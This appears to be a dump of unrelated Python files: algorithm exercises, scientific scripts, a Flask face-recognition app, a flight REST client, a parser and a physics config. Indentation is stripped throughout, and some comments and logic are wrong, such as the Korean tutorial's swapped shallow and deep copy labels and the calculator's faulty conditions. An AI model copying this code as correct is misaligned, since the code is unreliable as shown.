sep=False
while True:
year+=1
visited={}
move=[[1,0],[0,1],[-1,0],[0,-1]]
ice=deque()
while q:
node=q.popleft()
if node not in visited:
cnt=0
visited[node]=True
for v in move:
mx=v[0]+node[0]
my=v[1]+node[1]
if board[my][mx]==0 and (mx, my) not in visited:
cnt+=1
else:
q.append((mx, my))
board[node[1]][node[0]]=max(0, board[node[1]][node[0]]-cnt)
if board[node[1]][node[0]]>0:
ice.append((node[0], node[1]))
q=ice
if len(q)==0: break
q2.append(q[0])
visited2={}
while q2:
node=q2.popleft()
if node not in visited2:
visited2[node]=True
for v in move:
mx=v[0]+node[0]
my=v[1]+node[1]
if board[my][mx]>0:
q2.append((mx, my))
if len(q)!=len(visited2):
sep=True
break
if sep:
print(year)
else:
print(0) |
#!/usr/bin/env python
"""Write a reduced lammpstrj file by skipping frames."""
import pathlib
import sys
import re
import io
import mmap
from tqdm import tqdm
def read_lammpstrj(lmp):
"""Iterate frames in a lammpstrj file."""
raw = []
with open(lmp, 'r') as infile:
for lines in infile:
if lines.startswith('ITEM: TIMESTEP'):
if raw:
yield raw
raw = []
raw.append(lines)
if raw:
yield raw
def count_frames(lmp):
"""Count the number of frames in a lammpstrj file."""
pattern = re.compile(b'ITEM: TIMESTEP')
with io.open(lmp, 'r', encoding='utf-8') as infile:
match = pattern.finditer(
mmap.mmap(infile.fileno(), 0, access=mmap.ACCESS_READ)
)
return sum(1 for _ in match)
return 0
def main(infile, skip=10):
"""Write a reduced lammpstrj file by skipping frames."""
print('Skip: {}'.format(skip))
print('Infile: {}'.format(infile))
infile_path = pathlib.Path(infile).resolve()
outfile = '{}-skip-{}.lammpstrj'.format(
str(pathlib.Path(infile).stem), skip
)
outfile_path = infile_path.parent.joinpath(outfile)
print('Outfile: {}'.format(outfile_path))
print('Getting number of frames in original file...')
frames_tot = count_frames(infile_path)
print('Frames in original file: {}'.format(frames_tot))
if frames_tot < 1:
print('No frames found, exiting...')
return
frames = 0
frames_read = 0
with tqdm(total=frames_tot) as pbar:
with open(outfile_path, 'w') as output:
for i, frame in enumerate(read_lammpstrj(infile_path)):
frames_read += 1
pbar.update(1)
if i % skip == 0:
frames += 1
output.write(''.join(frame))
print('Frames read: {}'.format(frames_read))
print('Frames written to new file: {}'.format(frames))
return
if __name__ == '__main__':
try:
main(sys.argv[1], skip=int(sys.argv[2]))
except IndexError:
main(sys.argv[1])
|
'''
Created on 2011-9-24
ARG1: FILE NAME
ARG2: YEAR
ARG3: MONTH
SAMPLE: d:\dp21 2011 SEP
USAGE: JIE XI BAO GAO
@author: caspar32
'''
import sys
initialDay=17
endDay=21
startTime=20
endTime=05
specialBeginDay=20
specialEndDay=21
if __name__ == '__main__':
fileName=sys.argv[1]
year=sys.argv[2]
month=sys.argv[3]
date=month+" "+year
while(initialDay<=endDay):
inputFile = open(fileName,'r')
for lineContent in inputFile:
if (lineContent.find(date)!=-1):
tmpDate=str(initialDay)+" "+date
if(lineContent.find(tmpDate)!=-1):
outputFileName=inputFile.name+'-'+str(month)+'-'+str(initialDay)
outputFile=open(outputFileName,'w')
outputFile.write(lineContent)
newLineContent=inputFile.next()
judgeDate=str(initialDay+1)+' '+date
count=0
while (newLineContent.find(judgeDate)==-1):
outputFile.write(newLineContent)
if(newLineContent.find('FULL ARCHIVE LOG')!=-1):
count=count+1
newLineContent=inputFile.next()
print count
inputFile.close()
outputFile.close()
initialDay=initialDay+1;
inputFile1 = open(fileName,'r')
for lineContent in inputFile1:
tmpDate=str(specialBeginDay)+" "+date
if(lineContent.find(tmpDate)!=-1):
while (lineContent[1:3]<str(startTime)):
lineContent=inputFile1.next()
else:
outputFileName=inputFile1.name+'-'+str(month)+'-special'
outputFile1=open(outputFileName,'w')
tmpDate1=str(specialEndDay)+" "+date
newLineContent=lineContent
count=0
while(newLineContent.find(tmpDate1)==-1):
outputFile1.write(newLineContent)
if(newLineContent.find('FULL ARCHIVE LOG')!=-1):
count=count+1
newLineContent=inputFile1.next()
while (newLineContent[2:3]<str(endTime)):
outputFile1.write(newLineContent)
if(newLineContent.find('FULL ARCHIVE LOG')!=-1):
count=count+1
newLineContent=inputFile1.next()
print count
outputFile1.close()
|
# Chapter 04-01
# 시퀀스형
'''
< 자료구조 구분 기준>
1-1. 컨테이너(Container) - 서로다른 자료형 구성 가능
=> list, tuple, collections.deque
1-2. Flat - 한 개의 자료형으로 구성
=> str, bytes, bytes array, array.array, memoryview
2-1. 가변 자료구조
=> list, bytes array, array.array, memoryview, deque
2-2. 불변 자료구조
=> tuple, str, bytes
'''
# ord(string)은 문자열의 유니코드 번호를 반환해줌
# 1.일반 list append
chars = '!@$##%$^%$^&'
code_lst1 = []
for c in chars:
code_lst1.append(ord(c))
print("일반 list append: ", code_lst1)
# List comprehension => 데이터 양이 커지면서 이런 방법이 더 속도가 우세하다고 함!
code_lst2 = [ord(c) for c in chars]
print("list comprehension: ", code_lst2)
print('-'*50)
# ------------------------------------------------------------------
# Map, Filter는 iterator를 만듦!
# filter 함수는 filter(함수, iterable한 객체) => iterator가 결과기 때문에 next()를 이용해 출력 가능
filter_ = filter(lambda x: x > 40, [ord(c) for c in chars])
print("filter에 list감싸준 후 :", list(filter_))
# list로 감싸서 list형태로 만들어주자
# map 함수
map_ = map(ord, chars)
print([ord(c) for c in chars])
print('첫번째 요소:', next(map_))
print('두번째 요소:', next(map_))
print('세번째 요소:', next(map_))
# ------------------------------------------------------------------
# list comprehension VS Map + Filter
code_lst3 = [ord(c) for c in chars if ord(c) > 40]
code_lst4 = list(filter(lambda x: x > 40, map(ord, chars)))
print("list comprehension: ", code_lst3)
print("Map + Filiter: ", code_lst4)
print('-'*50)
# Generator 생성 -> 메모리를 절약하기 위해 데이터를 생성하기 직전 생성할 준비만 맞춰놓은 상태라고 할 수 있음!
# 한개의 자료구조를 갖으면서 가변적인 array 자료구조 사용해보기
import array
# Generator는 list comprehension 표현식에서 대괄호[] -> 소괄호()로 바꿔!
tuple_g = (ord(c) for c in chars)
print(tuple_g, type(tuple_g))
print([ord(c) for c in chars]) # list comprehension은 데이터를 모두 메모리에 올려버림..!
print(next(tuple_g))
print(next(tuple_g))
# Generaotr 이용해 4개의 반과 각 20개의 번호를 갖는 자료구조 생성
students_g = (f"{room}반 {num}번" for room in 'A B C D'.split() for num in range(1, 21))
print(students_g)
for student in students_g:
print(student)
# Python의 얕은 복사 Vs 깊은 복사
marks1 = [['&'] * 3 for _ in range(4)] # 얕은 복사
marks2 = [['&'] * 3] * 4 # 깊은 복사
print(marks1)
print(marks2)
print("일부 요소 수정 후")
marks1[0][0] = '#'
marks2[0][0] = '#'
print(marks1)
print(marks2) # 한 위치의 데이터를 바꾸었는데 나머지도 다 바뀜 왜!? => list의 id가 동일여부 차이!
# list의 id 동일 여부 비교해보기
marks1_id = [id(l) for l in marks1]
marks2_id = [id(l) for l in marks2]
print(marks1_id)
print(marks2_id)
|
import os
import sys
import dlib
import glob
import csv
import pickle as pp
from sklearn.neighbors import KNeighborsClassifier
import pandas as pd
from sklearn import preprocessing
# from sklearn.model_selection import train_test_split
import webbrowser
from timeit import Timer
from keras.preprocessing.image import img_to_array
from keras.models import load_model
import numpy as np
from time import time
import multiprocessing
from flask import Flask, render_template, request
from PIL import Image
from elasticsearch import Elasticsearch
#from tensorflow.python.keras._impl.keras.preprocessing.image import img_to_array
from flask import Flask, render_template, request, url_for
app = Flask(__name__, template_folder='templates')
App_root=os.path.dirname("maintype")
@app.route("/knn")
def classify(try_vector): #CLASIFIER OPTION -A using KNN
print("in classifier======================================================")
p_1=pp.load(open('model.p','rb'))
p_2=pp.load(open('model_1.p','rb'))
pred = p_1.predict([try_vector])
v = p_2.inverse_transform(pred)
# print(p_2.inverse_transform(pred))
return v
def vector(destination,option): ###CONVERTING IMAGE INTO 128 vectors --DLIB
predictor_path = "shape_predictor_5_face_landmarks.dat"
face_rec_model_path = "dlib_face_recognition_resnet_model_v1.dat"
faces_folder_path ="./"+destination # Edit Path Name
detector = dlib.get_frontal_face_detector()
sp = dlib.shape_predictor(predictor_path)
facerec = dlib.face_recognition_model_v1(face_rec_model_path)
img = dlib.load_rgb_image(faces_folder_path)
dets = detector(img, 1)
for k, d in enumerate(dets):
shape = sp(img, d)
face_descriptor = facerec.compute_face_descriptor(img, shape)
try_vector=face_descriptor
#print("======================================",try_vector)
if option == "KNN":
starttime = time()
d = classify(try_vector) #knn
timetaken = time()-starttime
print(timetaken)
elif option == "ES":
print("ES Selected")
return ("ES Selected")
# d = esearch(try_vector)
else:
print("CNN Chosen")
return d
@app.route("/") # this runs first
def index():
print("index working==================================")
return render_template("upload1.html")
@app.route("/upload", methods = ['POST'])
def upload():
# print("heyy========================")
target = os.path.join(App_root, "images/")
# print("hello")
if not os.path.isdir(target):
print("In here")
os.mkdir(target)
print("-----------------------",request.files.getlist("file"))
for file in request.files.getlist("file"):
filename = file.filename
destination ="".join([target, filename])
print(destination)
file.save(destination)
option = request.form['classifier']
print(option)
if( option == "KNN" or option == "ES"):
name1 = vector(destination,option)
name1 = str(name1[0])
print(name1, type(name1))
f = open('helloworld.html', 'w')
name = name1 + '.jpg'
# print(name)
name2 = "/home/madhur/Desktop/project2/src/images/" + name
# print(name2)
message = """<html>
<head></head>
<body>
<p>Your input image: </p>
<br>
<img src = "/home/madhur/Desktop/project2/src/""" + destination + """"/>
<br>
<p>Standard Image:</p>
<br>
<img src = "/home/madhur/Desktop/project2/src/images/""" + name + """"/>
<p> """ + name1 + """</p>
</body>
</html>"""
# print(message)
f.write(message)
f.close()
# Change path to reflect file location
filename = 'helloworld.html'
webbrowser.open_new_tab(filename)
return name
# return name
else:
# print("CNN Chosen")
# return("Hello world")
name = vector(destination, option)
name = str(name[0])
print(name, type(name))
f = open('complete.html', 'w')
message = name
f.write(message)
f.close()
# with open("complete.html", "w") as file1:
# file1.write(html)
# return render_template("complete.html")
return("This is CNN Button")
if __name__== "__main__":
app.run(debug=True,port=5001,host='127.0.0.1')
|
import pandas as pd
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.optimizers import SGD
from keras.layers.advanced_activations import ParametricSoftExponential, ParametricSoftplus
from keras.regularizers import l1, activity_l1, l1l2
M = 30000
N = 1
nb_epoch = 100
num_experiments = 5
results = []
for i in range(num_experiments):
X = pd.DataFrame(pd.np.random.randn(M, 2))
y = pd.DataFrame((X.T.values[:N] * X.T.values[N:])).sum()
row = []
for act in [ParametricSoftExponential(0.0), ParametricSoftplus(), Activation('relu'), Activation('linear')]:
model = Sequential()
model.add(Dense(2 * N, input_dim=2 * N, W_regularizer=l1l2(0.005)))
model.add(act)
model.add(Dense(1 * N, input_dim=2 * N, W_regularizer=l1l2(0.005)))
model.add(act)
model.add(Dense(1, input_dim=1 * N, W_regularizer=None)) # l1l2(0.003)))
model.add(Activation('linear'))
# model.add(Dense(2, input_dim=2, W_regularizer=l1l2(0.001)))
# # model.add(ParametricSoftplus(.2))
# model.add(ParametricSoftExponential(.9, output_dim=1))
# model.add(Dense(1, input_dim=2, W_regularizer=l1l2(0.001)))
# # model.add(ParametricSoftplus(.2))
# model.add(ParametricSoftExponential(-.9))
# model.add(Dense(1, input_dim=2, W_regularizer=l1l2(0.001)))
# model.add(Activation('relu'))
# solution varies even when training data is unchanged
# this will converge to < 0.01 loss about 60% of the time, NaNs about 20% of the time, and RMSE loss 1.-3. for the remainder
model.compile(loss='mean_squared_error', optimizer='rmsprop') # SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True))
model.fit(X.values, y.values, batch_size=32, validation_split=0, nb_epoch=nb_epoch)
row += [model.evaluate(X.values, y.values)]
print(row)
results += [row]
|
from Calc import *
a= int(input("Enter The First no:"))
b= int(input("Enter Seccond no:"))
char=(input("Choose The Operation..\nAdd= a,A\nSub=s,S\nmul=M,m\ndiv=d,D\n"))
if char =='a'and'A':
c=add(a,b)
print("Addition:",c)
elif char =='s'and 'S':
c=sub(a,b)
print("Substraction",c)
elif char =='m'and 'M':
c=mul(a,b)
print("Multiplication:",c)
elif char =='D'and'd':
c=div(a,b)
print("Division:",c)
else:
print("NO Choice FOund:")
|
import time
def selection_sort(data, drawData, tick):
for i in range(len(data) - 1):
minIndex = i
for j in range(i + 1, len(data)):
if(data[j] < data[minIndex]):
drawData(data, ['blue' if x == minIndex else 'gray' for x in range(len(data))])
time.sleep(tick)
minIndex = j
drawData(data, ['green' if x == i or x == minIndex else 'gray' for x in range(len(data))])
time.sleep(tick)
data[i], data[minIndex] = data[minIndex], data[i]
|
class Videogame:
def __init__(self,id,name,year,price,category1,category2,category3,picture,banner,description):
self.id = id
self.name = name
self.year = year
self.price = price
self.category1 = category1
self.category2 = category2
self.category3 = category3
self.picture = picture
self.banner = banner
self.description = description
def dump(self):
return {
'id': self.id,
'name': self.name,
'price': self.price,
'category1': self.category1,
'category2': self.category2,
'category3':self.category3,
'picture':self.picture,
'banner':self.banner,
'description':self.description,
} |
import os
import json
import sys
import shutil
import uuid
import datetime
import uuid
from urllib.parse import unquote_plus
import pandas as pd
import torch
from botocore.exceptions import ClientError
from torch.utils.data import DataLoader, SequentialSampler, TensorDataset
from transformers import BertModel, BertTokenizer, AutoTokenizer
import numpy as np
from numpy import dot
from numpy.linalg import norm
from transformers import DistilBertTokenizer
from tqdm import tqdm
###### importar libreria transformer y modelo sentence BERT ######
import sentence_transformers as st
###################################################################
import procesamiento_similitud as procesamiento
model = st.SentenceTransformer('sentence-model/')
data = pd.read_excel("salidaregla7Ene.xlsx")
data = data[pd.notnull(data["ObservacionFinal"])]
# calcular vector de de caracteristicas
df_similitud = procesamiento.calcular_vector_caracteristicas(data,model)
# luego este batch debe ser utilizado para calcular las similitudes
# con la lambda CalcularSimilitudes
#
print(len(df_similitud))
df_similitud.to_excel("resultadoSimiEne.xlsx", index = False)
def similitud_coseno_numpy(a,b):
cos_sim = dot(a, b)/(norm(a)*norm(b))
result = cos_sim
return result
def similitud(data):
"""
Se calculan las similitudes entre los comentarios del nuevo batch(df1) y
la base de datos(df) y se obtiene como salida un df con las similitudes.
df: Base de datos total
df1: Nuevo batch
return:
df: Nueva base de datos = df + df1
df_similitud: DataFrame de similitudes entre comentarios
"""
df = data.copy()
n_columna1 = 'ObservacionFinal'
delta = datetime.timedelta(days = 30)
df["regla1"] = 1
df["regla2"] = 1
df["regla3"] = 1
df["Semejanza_Persona"] = 0
df["Semejanza_Difer"] = 0
df["Semejanza_Persona"] = df["Semejanza_Persona"].astype(object)
df["Semejanza_Difer"] = df["Semejanza_Difer"].astype(object)
# se agrega df1 a df para comparar cada elemento de df1 con todos los elementos existentes.
# loop en cada un de los comentarios del batch
for i in tqdm(range(len(df))):
obs_i = df[n_columna1].iloc[i] #observacion i OPS
fecha_i = df['Creado'].iloc[i] # fecha creacion obs i
operacion_i = df['Operacion'].iloc[i]
empresa_i = df['EmpresaContratistaPersonaLiderActividad'].iloc[i]
llave_i = df["Llave"].iloc[i]
# Se selecciona a partir de la base de datos el conjunto de elementos que tienen la misma operacion y
# fueron creados antes que la obs_i
conjunto = df[(df['Operacion']==operacion_i)&(df['Creado']<fecha_i)]
conjunto_name = conjunto[(conjunto["Creado"]> fecha_i-delta)&(conjunto["Llave"]==llave_i)]
conjunto_Noname = conjunto[(conjunto["Creado"]> fecha_i-delta)&(conjunto["Llave"]!=llave_i)]
aux = []
aux1 = []
#print("frase------------")
#print(obs_i)
#print("conjunto ---------------------------")
#print(conjunto_name)
for j in range(len(conjunto_Noname)):
obs_j = conjunto_Noname[n_columna1].iloc[j] # observacion j
ponderador = np.min([len(obs_i),len(obs_j)])/np.max([len(obs_i),len(obs_j)])
similitud = similitud_coseno_numpy(np.array(df["VectorCaracteristicas"].iloc[i]),np.array(conjunto_Noname["VectorCaracteristicas"].iloc[j]))
similitudPon = similitud*ponderador
if similitudPon == 1.0:
aux.append(obs_j)
df["regla2"].iloc[i] = 0
for h in range(len(conjunto_name)):
obs_h = conjunto_name[n_columna1].iloc[h] # observacion j
ponderador = np.min([len(obs_i),len(obs_h)])/np.max([len(obs_i),len(obs_h)])
similitud = similitud_coseno_numpy(np.array(df["VectorCaracteristicas"].iloc[i]),np.array(conjunto_name["VectorCaracteristicas"].iloc[h]))
similitudPon = similitud*ponderador
#print(similitudPon)
if similitudPon == 1.0:
df["regla1"].iloc[i] = 0
elif (similitudPon <= 1.0) & (similitudPon > 0.7):
aux1.append(obs_h)
df["regla3"].iloc[i] = 0
df["Semejanza_Persona"].iloc[i] = aux1
df["Semejanza_Difer"].iloc[i] = aux
return df
aux = similitud(df_similitud) |
print("Demonstration of List")
batches = ["PPA","LB","Angular","Python"]
print(batches)
print(batches[0])
print(batches[1])
print(batches[-1])
print(batches[1:])
print(batches[:3])
# We can store Heterogenious data
data1 = [11,"Shri Swami Samarth",3.14]
print(data1)
data2 = [23,"Om Shiv Shankara",22.48]
print(data2)
# We can create list of list
combined = [data1,data2]
print(combined)
# There are multiple methods that we can used to manipulate list
batches.append("MEAN")
print(batches)
batches.insert(2,"LSP")
print(batches)
batches.remove("LSP")
print(batches)
batches.pop()
print(batches)
batches.pop(2)
print(batches)
del batches[1:]
print(batches)
batches.extend(["LB","PYTHON","ANGULAR","MEAN"])
print(batches)
batches.sort()
print(batches)
|
from transaction import Transaction
class Response(Transaction):
RESPONSE_ACCOUNT_BALANCE= "Account balance"
RESPONSE_MEMBERSHIP_NUM= "Membership number"
def __init__(self, date_time, token):
super().__init__(date_time, token)
self._input = input
@staticmethod
def _validate_str(display_name, str_value):
""" Check if the string is None or empty"""
if str_value == None:
raise ValueError(display_name + " cannot be none")
elif str_value == "":
raise ValueError(display_name + " cannot be empty")
@staticmethod
def _validate_float(display_name, float_value):
""" Check if the number is less than 0"""
if float_value == None or type(float_value) != float:
raise ValueError(display_name + " must be a valid floating point value")
elif float_value < 0.0 :
raise ValueError(display_name + " cannot be negative")
@staticmethod
def _validate_int(display_name, int_value):
""" Check if the number is less than 0"""
if int_value == None or type(int_value) != int:
raise ValueError(display_name + " must be a valid integer value")
elif int_value < 0.0:
raise ValueError(display_name + " cannot be negative") |
import requests, json
HEADER = "http://127.0.0.1:5000"
def get_all_flights():
get_request = requests.get(HEADER + f'/dbInfo')
response = get_request.text
jsons = json.loads(response)
string_to_return = ""
for flight in jsons:
flight_string = f"ID: {flight['id']}, From: {flight['city_from']}, To:{flight['city_to']}, Departure: {flight['departure']}, Arrival: {flight['arrival']}, Airplane: {flight['airplane']}, Passenger Number: {flight['passenger_number']}"
string_to_return += flight_string+'\n'
return string_to_return
def user_get_from_to(from_c, to_c):
get_request = requests.get(HEADER + f'/flights/{from_c}/{to_c}')
response = get_request.text
jsons = json.loads(response)
string_to_return = ""
for flight in jsons:
flight_string = f"From: {flight['city_from']}, To:{flight['city_to']}, Departure: {flight['departure']}, Arrival: {flight['arrival']}, Airplane: {flight['airplane']}, Passenger Number: {flight['passenger_number']}"
string_to_return += flight_string+'\n'
return string_to_return
def check_login(admin_email, admin_password):
login_response = requests.post(HEADER + f"/authentication_authorization", {'email': admin_email, 'password': admin_password})
token = login_response.text
json_token = json.loads(token)
return json_token
def add_to_db(fr, to, t1, t2, a_info, p_num, token):
add_response = requests.post(HEADER + f"/flights", {'token': token, 'fromm': fr, 'to': to, 't1': t1, 't2': t2, 'a_info': a_info, 'p_num': p_num})
def delete_from_db(id, token):
delete_response = requests.delete(HEADER + f"/flights", data={'token': token, 'id': id})
def update_db(id, fromCity, toCity, time1, time2, airplaneInfo, passengerNumber, token):
put_response = requests.put(HEADER + f"/flights", data={'id': id, 'fromC': fromCity, "toC": toCity, "time1": time1, "time2": time2, "aInfo": airplaneInfo, "psngrNum": passengerNumber, 'token': token})
def end_session(token):
delete_response = requests.delete(HEADER + f"/end_session", data={'token': token})
def main():
while True:
person=input('Role (user or admin): ')
if person=="user":
print('')
print("User can make a GET request to http://127.0.0.1:5000/flights/<city_from>/<city_to>")
print('')
city_from = input("city_from: ")
city_to = input("city_to: ")
output = user_get_from_to(city_from, city_to)
print('\nResults:')
print(output)
elif person=="admin":
print('')
email = input('Email: ')
password = input('Password: ')
tokenn = check_login(email, password)
token = tokenn[0]['token']
if(tokenn[0]['token'] != ''):
#login is successful
print()
print('Original DB:\n')
original_db = get_all_flights()
print(original_db)
print()
print("-"*18)
print('ADMIN OPTIONS:\n')
print('*** please, enter flight data without spaces. For example: NOT "June 18, 08:00am", type "June_18,_08:00am"\n')
print('1. POST <city_from> <city_to> <departure_time> <arrival_time> <airplane> <passenger_number>\n')
print('2. DELETE <flight_id>\n')
print('3. PUT <flight_id>\n')
print('4. END_SESSION\n')
print("-"*18)
while True:
option = int(input('Which option would you like to use? '))
if(option == 1):
#POST Mexico Baku may_15,09:00am may_15,23:59pm airplane_5 566
command, fr, to, t1, t2, a_info, p_num = map(str, input('Type command: ').split())
add_to_db(fr, to, t1, t2, a_info, p_num, token)
print('\nDB after POST request:\n')
added_db = get_all_flights()
print(added_db)
elif(option == 2):
command, id = map(str, input('Type command: ').split())
delete_from_db(id, token)
print('\nDB after DELETE request:\n')
deleted_db = get_all_flights()
print(deleted_db)
elif(option == 3):
command, id = map(str, input('Type command: ').split())
print('')
fromCity = input('new city_from: ')
toCity = input('new city_to: ')
time1 = input('new departure_time: ')
time2 = input('new arrival_time: ')
airplaneInfo = input('new airplane_info: ')
passengerNumber = input('new passengerNumber: ')
update_db(id, fromCity, toCity, time1, time2, airplaneInfo, passengerNumber, token)
print('\nDB after PUT request:\n')
updated_dbb = get_all_flights()
print(updated_dbb)
elif(option == 4):
command = input('Type command: ')
end_session(token)
token=''
print(token)
break
else:
#login failed
print('>>>>>> invlaid credentials !!!\n')
if __name__=="__main__":
main() |
import sys
import ply.yacc as yacc
from parameter import *
def p_document(p):
"""
document :
document : token_list
"""
if len(p) == 1:
p[0] = []
else:
p[0] = p[1]
def p_token_list(p):
"""
token_list :
token_list : STRING token_list
token_list : parameter token_list
"""
if len(p) == 1:
p[0] = []
else:
p[0] = [p[1]] + p[2]
def p_paramter(p):
"""
parameter : AT STRING AT
"""
p[0] = Parameter(p[2])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import random
import torch
import argparse
import torch.nn as nn
import torch.utils.data as data
import torchvision.transforms as transforms
#from src.feat_model import *
#from src.featset import *
from src.rank_model import *
from src.rankset import *
import numpy as np
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def model_eval(model,testing_set,cnn=False):
dish_feat = []
ingr_feat = []
#outfile = open('rank.rec','w')
#for i in range(len(testing_set.dish_feat)):
ind = np.arange(len(testing_set.dish_feat))
random.shuffle(ind)
trec = {}
rrec = ind[:1000]
for i in ind[:1000]:
trec[i] = {'ingr':[],'ranklist':[]}
dish_img_feat = testing_set.dish_feat[i]['feat']
dish_feat.append(dish_img_feat)
ingr_img_feat = np.zeros((10,len(dish_img_feat)))
nn = 0
for j in testing_set.dish_feat[i]['ingrs']:
ingr_id = testing_set.vocab[j-2]
if ingr_id in testing_set.ingr_feat:
trec[i]['ingr'].append(ingr_id)
ingr_img_feat[nn] = random.sample(testing_set.ingr_feat[ingr_id],1)[0]
nn += 1
ingr_feat.append(ingr_img_feat)
dish_feat = np.array(dish_feat)
dish_emb = torch.FloatTensor(dish_feat).to(device)
dish_emb = model.visual_embedding1(dish_emb)
ingr_feat = np.array(ingr_feat)
ingr_embs = torch.FloatTensor(ingr_feat).to(device)
if cnn:
dims = ingr_embs.shape
ingr_embs = ingr_embs.view(dims[0],1,dims[1],dims[2])
ingr_embs = model.ingr_embedding(ingr_embs).squeeze() # size (bsz, 1024)
ingr_embs = model.ingr_embedding2(ingr_embs)
else:
concat_ingr = ingr_embs.view(ingr_embs.size(0), -1) # size (bsz, 1024 * 10)
ingr_embs = model.ingr_embedding(concat_ingr)
rec = []
for i in range(1000):
ingr_in = ingr_embs[i].repeat(1000,1)
final_emb = torch.cat((dish_emb,ingr_in),1)
score = model.score(final_emb)
#score = model.score(dish_emb,ingr_in)
score = score.cpu().detach().numpy().flatten()
rank_list = score.argsort()[::-1]
for r in rank_list:
trec[rrec[i]]['ranklist'].append(rrec[r])
rank = np.where(rank_list==i)
trec[rrec[i]]['rank'] = rank
#print(rank)
rec.append(rank)
rec = np.array(rec)
#print(rec.mean())
#print(np.median(rec))
#print((rec < 10).sum()/1000)
pickle.dump(trec,open('/home/ylien/case.rec','wb'))
return np.median(rec),(rec < 1).sum()/1000,(rec < 5).sum()/1000,(rec < 10).sum()/1000
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("--dish_feat_path", type=str, default="data/")
parser.add_argument("--ingr_feat_path", type=str, default="data/")
parser.add_argument("--dish_info_path", type=str, default="data/dish_info")
parser.add_argument("--vocab_path", type=str, default="data/vocab.txt")
parser.add_argument("--model_path", type=str)
args = parser.parse_args()
return args
def test(opt):
#part = 'test'
part = 'test'
testing_set = FeatDataset(opt.dish_feat_path+part+'_featset.pkl', opt.ingr_feat_path+'ingr_feat.pkl',opt.dish_info_path,opt.vocab_path,part)
model = torch.load(opt.model_path)
model.eval()
metric = [[],[],[],[]]
for _ in range(1):
medR,r1,r5,r10 = model_eval(model,testing_set,('cnn' in opt.model_path))
metric[0].append(medR)
metric[1].append(r1)
metric[2].append(r5)
metric[3].append(r10)
metric = np.array(metric)
for i in range(4):
print(metric[i].mean())
def main():
opt = get_args()
test(opt)
if __name__ == "__main__":
main()
|
import FWCore.ParameterSet.Config as cms
allConversions = cms.EDProducer('ConversionProducer',
AlgorithmName = cms.string('mixed'),
#src = cms.VInputTag(cms.InputTag("generalTracks")),
src = cms.InputTag("gsfGeneralInOutOutInConversionTrackMerger"),
convertedPhotonCollection = cms.string(''), ## or empty
bcEndcapCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALEndcap'),
bcBarrelCollection = cms.InputTag('particleFlowSuperClusterECAL:particleFlowBasicClusterECALBarrel'),
scBarrelProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALBarrel'),
scEndcapProducer = cms.InputTag('particleFlowSuperClusterECAL:particleFlowSuperClusterECALEndcapWithPreshower'),
primaryVertexProducer = cms.InputTag('offlinePrimaryVerticesWithBS'),
deltaEta = cms.double(0.4), #track pair search range in eta (applied even in case of preselection bypass)
HalfwayEta = cms.double(.1),# Track-bc matching search range on Eta
maxNumOfTrackInPU = cms.int32(999999),
maxTrackRho = cms.double(120.),
maxTrackZ = cms.double(300.),
minSCEt = cms.double(10.0),
dEtacutForSCmatching = cms.double(0.03),
dPhicutForSCmatching = cms.double(0.05),
dEtaTrackBC = cms.double(.2), # Track-Basic cluster matching, position diff on eta
dPhiTrackBC = cms.double(1.), # Track-Basic cluster matching, position diff on phi
EnergyBC = cms.double(0.3), # Track-Basic cluster matching, BC energy lower cut
EnergyTotalBC = cms.double(.3), # Track-Basic cluster matching, two BC energy summation cut
#tight cuts
d0 = cms.double(0.), #d0*charge cut
MaxChi2Left = cms.double(10.), #Track quality
MaxChi2Right = cms.double(10.),
MinHitsLeft = cms.int32(4),
MinHitsRight = cms.int32(2),
DeltaCotTheta = cms.double(0.1), #Track pair opening angle on R-Z
DeltaPhi = cms.double(.2), #Track pair opening angle on X-Y (not a final selection cut)
vtxChi2 = cms.double(0.0005),
MinApproachLow = cms.double(-.25), #Track pair min distance at approaching point on X-Y
MinApproachHigh = cms.double(1.0), #Track pair min distance at approaching point on X-Y
rCut = cms.double(2.0),#analytical track cross point
dz = cms.double(5.0),#track pair inner position difference
# kinematic vertex fit parameters
maxDelta = cms.double(0.01),#delta of parameters
maxReducedChiSq = cms.double(225.),#maximum chi^2 per degree of freedom before fit is terminated
minChiSqImprovement = cms.double(50.),#threshold for "significant improvement" in the fit termination logic
maxNbrOfIterations = cms.int32(40),#maximum number of convergence iterations
UsePvtx = cms.bool(True),
AllowD0 = cms.bool(True), #Allow d0*charge cut
AllowDeltaPhi = cms.bool(False),
AllowTrackBC = cms.bool(False), #Allow to match track-basic cluster
AllowDeltaCot = cms.bool(True), #Allow pairing using delta cot theta cut
AllowMinApproach = cms.bool(True), #Allow pairing using min approach cut
AllowOppCharge = cms.bool(True), #use opposite charge tracks to pair
AllowVertex = cms.bool(True),
bypassPreselGsf = cms.bool(True), #bypass preselection for gsf + X pairs
bypassPreselEcal = cms.bool(False), #bypass preselection for ecal-seeded + X pairs
bypassPreselEcalEcal = cms.bool(True), #bypass preselection for ecal-seeded + ecal-seeded pairs
AllowSingleLeg = cms.bool(False), #Allow single track conversion
AllowRightBC = cms.bool(False) #Require second leg matching basic cluster
)
from Configuration.Eras.Modifier_phase2_hgcal_cff import phase2_hgcal
phase2_hgcal.toModify( allConversions, bypassPreselGsf = False )
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(allConversions, src = 'gsfGeneralConversionTrackMerger')
|
# -*- coding: utf-8 -*-
"""
Tests for the tensor transform functions. Run with pytest.
Created on Sat May 9 00:09:00 2020
@author: aripekka
"""
import sys
import os.path
import numpy as np
sys.path.insert(1, os.path.join(os.path.dirname(__file__),'..'))
from tbcalc.transverse_deformation import *
from tbcalc import cartesian_tensors_to_cylindrical
from pyTTE import TTcrystal, Quantity
def test_isotropic_circular():
#Calculate the reference stresses and strains as implemented in the
#deprecated sbcalc package
E = 165
nu = 0.22
thickness = 0.1
Rx = 1000.0
Ry = 500.0
R = np.sqrt(Rx*Ry)
L = 100.0
x=np.linspace(-L/2,L/2,150)
X,Y=np.meshgrid(x,x)
RR = np.sqrt(X**2 + Y**2)
PHI = np.arctan2(Y,X)
stress, strain, P_imp = isotropic_circular(Rx, Ry, L, thickness, nu, E)
stress_cyl = cartesian_tensors_to_cylindrical(stress)
strain_cyl = cartesian_tensors_to_cylindrical(strain)
